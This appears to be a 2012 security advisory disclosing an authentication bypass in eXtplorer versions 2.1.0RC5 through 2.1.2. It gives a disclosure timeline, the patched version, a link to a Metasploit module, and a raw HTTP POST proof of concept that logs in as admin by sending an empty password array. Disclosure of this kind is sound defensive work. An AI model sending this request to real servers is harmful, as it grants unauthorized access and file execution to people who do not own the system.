eXtplorer v2.1 authentication bypass vulnerability

eXtplorer versions 2.1.2, 2.1.1, 2.1.0 and 2.1.0RC5 allow an unauthenticated user to bypass authentication and execute arbitrary files as the webserver user.

This vulnerability is only exploitable when eXtplorer is run as a standalone application. This issue has been patched in eXtplorer version 2.1.3.

Software

Software Link: http://extplorer.net/

Vulnerable Versions: 2.1.2, 2.1.1, 2.1.0 and v2.1.0RC5

Vendor Notification:

# 2012-12-25 - submitted bug report - bug id #105

# 2012-12-25 - vendor released patched version 2.1.3

# 2012-12-31 - advisory released

# 0x01 # Authentication Bypass

Sending a valid username with an empty password array allows anyone to log in as that user.

The following proof of concept is available:

POST /com_extplorer_2.1.2/index.php HTTP/1.1
Host: extplorer.example.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 88
Cookie: eXtplorer=uniquetoken;
Pragma: no-cache
Cache-Control: no-cache

option=com_extplorer&action=login&type=extplorer&username=admin&password[]=

An exploit is available here: https://github.com/rapid7/metasploit-framework/pull/1221

Appendix

[TXT] eXtplorer v2.1 authentication bypass vulnerability